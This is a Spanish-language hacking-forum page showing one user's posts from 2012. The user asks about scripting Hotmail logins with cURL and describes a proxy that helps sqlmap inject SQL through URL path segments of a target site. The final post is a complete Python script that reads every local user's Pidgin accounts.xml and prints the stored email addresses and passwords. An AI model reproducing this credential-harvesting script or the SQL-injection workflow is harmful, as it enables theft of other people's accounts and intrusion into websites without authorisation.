Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - afdlkglfgfdgfhgf

#41
nunca he utilizado ese programa pero revisa si tiene la opcion de enviar datos por post, la otra es generar una cookie( iniciando sesion en la web y cogiendo la cookie, tener en cuenta tanto User-Agent como referer ) y configurar para que utilize esa cookie.

for dummies : http://w3af.svn.sourceforge.net/viewvc/w3af/trunk/readme/EN/w3af-users-guide.pdf    :silbar:
#42
PHP / Re: ejecutar javascript con PHP (?)
22 Febrero 2012, 16:53 PM
gracis por responder, pero ya anoche habia logrado solucionar el problema, de todas formas me sirve bastante tu codigo  ;D.

saludos.
#43
PHP / ejecutar javascript con PHP (?)
22 Febrero 2012, 02:11 AM
estoy haciendo un script que se conecte a hotmail utilizando CURL , mi gran problema es que cuando intento inicar sesion, este detecta que no tengo javascript activado, eso es obvio ya que no ejecuto el script desde el navegador.

a alguien se le ocurre una idea??.

saludos.
#44
Nivel Web / Re: Duda con Sql Injection en Sql Map
12 Febrero 2012, 06:59 AM
podrias dar mas info  :huh:   , por ejemplo, el tipo de injeccion, la cantidad de tablas, el dbms , y la version de sqlmap que utilizas  :huh:
#45
Despues de haber perdido un par de horas de mi vida, intentando buscar algo parecido al
%IjectHere% de HAVIJ o un ${Inject_Here} como el de ACUNETIX en SQLMAP, primero tome la decision
de editar el codigo, pero me dio demasiada peresa, aparte que con una actualizacion volaba el codigo
asique me decidi mejor en hacer un mini proxy para el SQLMAP, les cuento como funciona.

primero echamos a andar el mini proxy, para esto necesitamos 3 parametros.

[1]PUERTO, de conexion entre el mini proxy y el sqlmap.(puede ser cualquiera :p)
[2]PARAMETRO, este es el parametro falso que modificara sqlmap(abajo explico ;)).
[3]URL, necesitamos la URL donde se encuentra la sqli, con EL TOKEN que nos indicara
  donde se encuentra el SQLI(Token por defecto "{fuck}").

un ejemplo seria asi ==> python proxySqlmap.py 4345 /cualquier_cosa.php?injectando= http://www.vulnerables.com.ar/carpeta1/identificador1/identificador2{fuck}/archivo.rar

PUERTO de conexion con el proxy => 4345
PARAMETRO falso                         => /cualquier_cosa.php?injectando=
URL  con el token, fijarse en {fuck} => http://www.vulnerables.com.ar/carpeta1/identificador1/identificador2{fuck}/archivo.rar

*El parametro falso debe coincidir tal cual con el que ponen en sqlmap.

donde el parametro identificador2 es el vulnerable(lee mas abajo y entenderas).
con esto dejamos nuestro proxy esperando conexiones en el puerto 4345.

¿como funciona?.
cuando ejecutamos sqlmap, lo hacemos de esta manera "python sqlmap.py -u "http://www.vulnerable.com.ar/carpeta1/ejecuta.php?id=3" -p id" , donde id es nuestra variable vulnerable a sqli, pero nosotros al tener un parametro vulnerable en otro lugar como es en mi caso, es asi "http://www.vulnerables.com.ar/carpeta1/identificador1/identificador2/archivo.rar" , las variables vulnerables son identificador1 e identificador2 , no tenia como shit indicar que esas variables eran vulnerables entonces se me ocurrio hacer lo siguiente, utilizamos nuestro localhost(pueden subirlo a un host si desean ;) ), como si fuese el servidor con la url y apuntamos en sqlmap una variable falsa(cualquier nombre), SIN DARLE UN VALOR por lo menos en esta version no !!xD , en mi caso le pondre "/cualquier_cosa.php?injectando=" , tonces la url nos quedaria de esta manera "http://127.0.0.1/cualquier_cosa.php?injectando=" , ademas debemos agregar el puerto de conexion a nuestro proxy, al ejecutar el sqlmap nos quedaria asi "python sqlmap.py http://127.0.0.1:4345/cualquier_cosa.php?injectando= -p injectando" , esto quiere decir que se conectara a nuestro host(127.0.0.1), y que realizara las peticiones <"GET"> a nuestro host y a la variable "injectando" de la pagina "cualquier_cosa.php", por otro lado tenemos corriendo el proxy haciendo creer que se mejante pagina y variable existe.

Entonces tenemos 2 ventanas de cmd abiertas, una donde corre nuestro proxy y la otra de sqlmap ;) .

espero que a alguien le sirva.

codigo en python ==> http://pastebin.com/NR5sx9u6

una imagen para que vean como reemplaza la injeccion :


PD: por ahi alguien podria mejorar o optimizar el codigo ;).

EDIT: modifique unas cosillas.
#46
Nivel Web / Re: duda con sqlmap
11 Febrero 2012, 03:17 AM
solucionado, tuve que realizarme un mini proxy para editar la injeccion, si desean que postee el mini proxy , me dicen y se los subo :p aunque lo mas probable que lo haga en estos dias ;)  34
#47
Nivel Web / duda con sqlmap[SOLUCIONADO]
9 Febrero 2012, 07:47 AM
escribo nuevamente ya que tengo un problema, resulta que tengo una injeccion sql en ORACLE, el problema es que la url con el sqli es de esta forma http://www.asdfgf2w.com/asdf1/asdf2/asdf3/archivo.doc , donde asdf3 es el vulnerable a sqli  :o  , el problema es que nose como poner en sqlmap que me tome ese como el parametro vulnerable, alguien sabe ??.

mi primera idea fue realizar un wrapper xD , en otro servidor , con la url tipo http://asdf.com/asdf.php?var1=[SQLI] , pero el servidor es demasiado inestable :/

saludos.

#48
Nivel Web / Re: Hackea a Elhacker.net v2.0
3 Febrero 2012, 16:59 PM
no he dicho nada :)  ;D

saludos.
#49
Cita de: PanConMantequilla en 31 Enero 2012, 05:55 AM
Holas, como reto personal me he propuesto a crear una herramienta en python que me muestre el resultado de un SQLi similar a SQLMap, (se que reinvento la rueda pero estoy obsesionado por hacerlo por mi mismo y entenderlo)

Personalmente he probado que SQLMap no sabe saltarse los firewall y los he tenido que hacer todo manualmente

Mi única duda para empezar es.. como capturo los datos devueltos por una SQLi de la web que estoy escaneando??, quiero capturar los datos devueltos y mostrarlos en la consola en python como SQLMap pero tengo dudas de como capturarlo.

Pensaba usar regexp pero cada web tiene una diagramación distinta, alguien tiene alguna idea?

Saludos


será que no lo sabes utilizar ?? http://www.websec.mx/blog/ver/Evadiendo_Web_Application_Firewalls_con_SQLMap

PD: podrias echarle una mirada al source de sqlmap ;)
#50
un simple script que obtiene las cuentas guardadas  del cliente de mensajeria PIDGIN.

probado en la version "Pidgin 2.6.6 (libpurple 2.6.6)"

Código (python) [Seleccionar]
##############################################
## Obtiene las ccuentas guardadas de pidgin ##
## Mail: angelofthedark@live.com.ar         ##
##############################################
import os

#funcion que obtiene las cuentas desde el archivo accounts.xml
def obtenerCuentas( ruta ):
    try:
        h    = open(usu+cuentasXML)
        src  = h.read()
        tmp1 = src.split("<name>")
        tmp2 = src.split("<password>")
        for s in tmp1:
            if "</name>" in s:
                cuentas[0].append(s.split("</name>")[0])
        for t in tmp2:
            if "</password>" in t:
                cuentas[1].append(t.split("</password")[0])
    except:
        print "Error, nose puede continuar !!"
        exit(0)


home       = "/home"
cuentasXML = ".purple/accounts.xml"
archivos   = os.listdir(home)
usuarios   = []
cuentas    = [[],[]] #cuentas[0][0] => mail ; cuentas[0][1] => password

for ar in archivos:
    if os.path.isdir(home+"/"+ar):
        usuarios.append(home+"/"+ar+"/")

for usu in usuarios:
    obtenerCuentas( usu+cuentasXML )


#imprime por pantalla el mail y el password.
cont = 0
for cnt in cuentas[0]:
    print "+++++++++++++++("+str(cont)+")+++++++++++++++"
    print "mail     ==> " + cnt
    print "password ==> " + cuentas[1][cont]
    cont+=1

print "+++++++++++++++(-.FIN.-)+++++++++++++++"



saludos.